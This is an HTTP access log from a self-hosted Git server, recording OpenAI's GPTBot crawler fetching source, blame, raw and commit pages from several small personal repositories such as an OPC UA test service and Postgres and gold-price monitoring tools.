"https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:14:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 9891] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:14:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 10694] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:14:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 10389] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:14:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 9901] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:14:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" [Client 74.7.227.38] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:14:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" [Client 74.7.227.38] [Length 9888] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:14:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 129] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:14:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" [Client 74.7.227.38] [Length 129] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" -[17/Feb/2026:14:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 10340] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.Development.json" -[17/Feb/2026:14:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 267] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" -[17/Feb/2026:14:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 9870] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" -[17/Feb/2026:14:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/global.json" -[17/Feb/2026:14:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fProgram.cs" [Client 74.7.227.38] [Length 24167] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/Program.cs" -[17/Feb/2026:14:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 12189] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" -[17/Feb/2026:14:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 558414] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main" -[17/Feb/2026:14:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fProgram.cs" [Client 74.7.227.38] [Length 21504] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:14:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fTestService%2fWorker.cs" [Client 74.7.227.38] [Length 22383] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:14:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10312] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project" -[17/Feb/2026:14:18:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 167169] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" -[17/Feb/2026:14:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 62992] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/controller-cpp.md" -[17/Feb/2026:14:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html?display=rendered" [Client 74.7.227.38] [Length 14372] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:14:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 10463] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" -[17/Feb/2026:14:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14349] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db" -[17/Feb/2026:14:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 11430] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:14:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 11468] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:14:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 3389] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:14:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 11458] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:14:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14350] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/my_database.db" -[17/Feb/2026:14:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10716] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm" -[17/Feb/2026:14:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11352] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm" -[17/Feb/2026:14:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10509] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm" -[17/Feb/2026:14:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14351] [Gzip 27.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db" -[17/Feb/2026:14:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14347] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db" -[17/Feb/2026:14:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 13134] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:14:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 10553] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" -[17/Feb/2026:14:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 9865] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" -[17/Feb/2026:14:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 10859] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:14:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" -[17/Feb/2026:14:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 10582] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.log" -[17/Feb/2026:14:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10417] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" -[17/Feb/2026:14:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 13045] [Gzip 6.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" -[17/Feb/2026:14:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" [Client 74.7.227.38] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" -[17/Feb/2026:14:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" -[17/Feb/2026:14:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 5813273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:14:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:14:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" [Client 74.7.227.38] [Length 10125671] [Gzip 22.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" -[17/Feb/2026:14:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" [Client 74.7.227.38] [Length 30153] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:14:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 9901] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 